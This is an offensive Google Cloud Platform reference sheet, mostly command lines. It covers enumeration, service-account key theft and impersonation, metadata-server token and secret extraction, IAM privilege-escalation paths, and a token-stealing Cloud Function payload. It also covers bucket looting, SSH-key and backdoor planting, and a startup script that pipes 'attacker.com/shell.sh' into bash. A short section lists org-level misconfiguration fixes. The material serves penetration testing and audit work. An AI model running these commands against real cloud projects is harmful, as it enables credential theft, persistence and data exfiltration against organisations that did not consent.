GCP-SECURITY
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
A practical reference for enumerating, exploiting, and auditing Google Cloud Platform environments.
GCLOUD CLI ENUMERATION#
# Authenticate gcloud auth login gcloud auth activate-service-account --key-file=creds.json # Get current identity gcloud auth list gcloud config list # List projects gcloud projects list # Set active project gcloud config set project <project-id> # List organizations gcloud organizations list # List all IAM bindings for a project gcloud projects get-iam-policy <project-id> # List all service accounts gcloud iam service-accounts list # List compute instances gcloud compute instances list # List storage buckets gsutil ls # List Cloud Functions gcloud functions list # List Cloud Run services gcloud run services list # Enumerate APIs enabled for a project gcloud services list --enabled # Get project metadata gcloud compute project-info describe
SERVICE ACCOUNT KEY ABUSE#
# Service account keys are long-lived credentials - major risk # List keys for a service account gcloud iam service-accounts keys list --iam-account <sa>@<project>.iam.gserviceaccount.com # Create a new key (if iam.serviceAccountKeys.create permission) gcloud iam service-accounts keys create key.json \ --iam-account <sa>@<project>.iam.gserviceaccount.com # Authenticate with stolen key gcloud auth activate-service-account --key-file=key.json # Use key directly with API export GOOGLE_APPLICATION_CREDENTIALS=/path/to/key.json # Generate access token from key gcloud auth print-access-token # Use access token with API curl -H "Authorization: Bearer $(gcloud auth print-access-token)" \ "https://cloudresourcemanager.googleapis.com/v1/projects" # Impersonate service account (if iam.serviceAccounts.getAccessToken) gcloud auth print-access-token --impersonate-service-account=<sa>@<project>.iam.gserviceaccount.com # Find exposed keys in repos # Search GitHub/GitLab for: "type": "service_account" AND "private_key" trufflehog git https://github.com/target/repo
METADATA API EXPLOITATION#
# GCP metadata server (accessible from any GCE instance) curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/ # Get access token from metadata curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" # Get service account email curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" # Get scopes curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" # Get instance attributes (may contain secrets) curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/attributes/" # Get project-wide metadata (SSH keys, startup scripts) curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/project/attributes/" # Get startup script (often contains credentials) curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script" # Kube-env (GKE - contains kubelet creds) curl -H "Metadata-Flavor: Google" \ "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" # SSRF to metadata endpoint # Target: http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token # Note: Requires Metadata-Flavor: Google header (harder to exploit via SSRF)
IAM POLICY ESCALATION#
# Key permissions for privilege escalation: # 1. iam.roles.update - Modify custom role to add permissions gcloud iam roles update <role-id> --project <project> \ --permissions "iam.serviceAccounts.getAccessToken,iam.serviceAccountKeys.create" # 2. iam.serviceAccounts.getAccessToken - Impersonate any SA gcloud auth print-access-token \ --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com # 3. iam.serviceAccountKeys.create - Create persistent key for any SA gcloud iam service-accounts keys create key.json \ --iam-account admin-sa@project.iam.gserviceaccount.com # 4. resourcemanager.projects.setIamPolicy - Set project-level IAM gcloud projects set-iam-policy <project> policy.json # 5. iam.serviceAccounts.implicitDelegation - Chain impersonation # SA-A can impersonate SA-B, SA-B can impersonate SA-C # With implicitDelegation on SA-B, SA-A can reach SA-C # 6. setIamPolicy on a service account - Grant yourself token creator gcloud iam service-accounts set-iam-policy <sa-email> policy.json # 7. deploymentmanager.deployments.create - Deploy arbitrary resources gcloud deployment-manager deployments create escalate --config deploy.yaml # 8. compute.instances.setMetadata - Add SSH key via metadata gcloud compute instances add-metadata <instance> \ --metadata ssh-keys="attacker:ssh-rsa AAAA..." # 9. compute.instances.setServiceAccount - Change instance SA gcloud compute instances set-service-account <instance> \ --service-account admin-sa@project.iam.gserviceaccount.com # 10. cloudfunctions.functions.create/update with actAs # Deploy function running as high-priv SA
CLOUD FUNCTIONS ABUSE#
# List functions gcloud functions list gcloud functions describe <function-name> # Get function source gcloud functions describe <function-name> --format="value(sourceArchiveUrl)" # Download the source from the GCS URL # Create function with high-priv SA (requires cloudfunctions.functions.create + iam.serviceAccounts.actAs) gcloud functions deploy escalate \ --runtime python39 \ --trigger-http \ --service-account admin-sa@project.iam.gserviceaccount.com \ --source . \ --entry-point handler # Payload (main.py) - steal SA token and exfil # import requests, google.auth, google.auth.transport.requests # def handler(request): # creds, project = google.auth.default() # creds.refresh(google.auth.transport.requests.Request()) # return creds.token # Update existing function code gcloud functions deploy <existing-function> --source . # Environment variables may contain secrets gcloud functions describe <function-name> --format="value(environmentVariables)" # Cloud Functions v2 (Cloud Run backed) gcloud functions deploy escalate \ --gen2 \ --runtime python39 \ --trigger-http \ --service-account admin-sa@project.iam.gserviceaccount.com \ --source .
GCS BUCKET MISCONFIGURATION#
# List buckets gsutil ls gsutil ls -la gs://<bucket>/ # Check bucket IAM gsutil iam get gs://<bucket>/ # Check bucket ACL gsutil acl get gs://<bucket>/ # Test anonymous access curl "https://storage.googleapis.com/<bucket>/" curl "https://storage.googleapis.com/<bucket>/sensitive-file.txt" # Check for allUsers or allAuthenticatedUsers gsutil iam get gs://<bucket>/ | grep -E "allUsers|allAuthenticatedUsers" # Download entire bucket contents gsutil -m cp -r gs://<bucket>/ ./loot/ # Upload to writable bucket gsutil cp backdoor.sh gs://<bucket>/startup.sh # Find GCS buckets via DNS/brute python3 cloud_enum.py -k targetcompany # Or use GCPBucketBrute python3 gcpbucketbrute.py -k target -w wordlist.txt # Signed URL abuse - if you can generate signed URLs gsutil signurl -d 7d key.json gs://<bucket>/sensitive-file.txt # Make bucket public (if you have setIamPolicy) gsutil iam ch allUsers:objectViewer gs://<bucket>/
COMPUTE ENGINE ATTACKS#
# List instances and their service accounts gcloud compute instances list --format="table(name,zone,serviceAccounts.email)" # SSH to instance gcloud compute ssh <instance> --zone <zone> # OS Login - check if enabled gcloud compute project-info describe --format="value(commonInstanceMetadata.items.filter(key:enable-oslogin))" # Serial port output (may contain boot logs with secrets) gcloud compute instances get-serial-port-output <instance> --zone <zone> # Add SSH key via project metadata (affects all instances) gcloud compute project-info add-metadata \ --metadata ssh-keys="attacker:$(cat ~/.ssh/id_rsa.pub)" # Create instance with custom SA gcloud compute instances create attacker-vm \ --service-account admin-sa@project.iam.gserviceaccount.com \ --scopes cloud-platform \ --zone us-central1-a # Snapshot disk for offline analysis gcloud compute disks snapshot <disk> --zone <zone> --snapshot-names loot-snap gcloud compute images create loot-image --source-snapshot loot-snap gcloud compute instances create forensics-vm --image loot-image # Startup script injection gcloud compute instances add-metadata <instance> \ --metadata startup-script='#!/bin/bash curl http://attacker.com/shell.sh | bash' # Custom image backdoor gcloud compute images create backdoored-image --source-disk <disk> --source-disk-zone <zone>
ORG-LEVEL MISCONFIGURATIONS#
# 1. No Organization Policy constraints # Fix: Set constraints/iam.disableServiceAccountKeyCreation gcloud resource-manager org-policies set-policy policy.yaml --organization <org-id> # 2. Default service account has Editor role # Fix: Remove Editor role from default compute SA gcloud projects remove-iam-policy-binding <project> \ --member="serviceAccount:<project-number>-compute@developer.gserviceaccount.com" \ --role="roles/editor" # 3. No VPC Service Controls # Fix: Create service perimeter for sensitive projects # 4. Audit logging not enabled gcloud logging sinks list # Fix: Enable Data Access audit logs for all services # 5. Overly permissive firewall rules gcloud compute firewall-rules list --format="table(name,direction,allowed,sourceRanges)" # Check for 0.0.0.0/0 source ranges # 6. Public IP on sensitive instances gcloud compute instances list --format="table(name,networkInterfaces.accessConfigs.natIP)" # 7. Domain-wide delegation on service accounts # Allows SA to impersonate any user in Workspace # Check: Admin Console > Security > API Controls > Domain-wide delegation # 8. No binary authorization for GKE # Fix: Enable Binary Authorization policy # 9. Missing Security Command Center (SCC) findings gcloud scc findings list <org-id> --source=<source-id> # 10. Default network in use gcloud compute networks list # Fix: Delete default network, create custom VPCs
USEFUL TOOLS & FRAMEWORKS#
# ScoutSuite - Multi-cloud security auditing python3 scout.py gcp --service-account key.json # Prowler for GCP prowler gcp --credentials-file key.json # GCPBucketBrute - Bucket enumeration python3 gcpbucketbrute.py -k target # Hayat - GCP privilege escalation scanner python3 hayat.py --project <project-id> # Cartography - Infrastructure graph cartography --gcp-key-file key.json # GCP IAM Privilege Escalation tool (Rhino Security) python3 gcp_iam_privesc.py --project <project-id> # Cloud Forensics Utils pip install libcloudforensics # Snapshot and analyze disks for incident response # gcloud cheat - quick reference gcloud cheat-sheet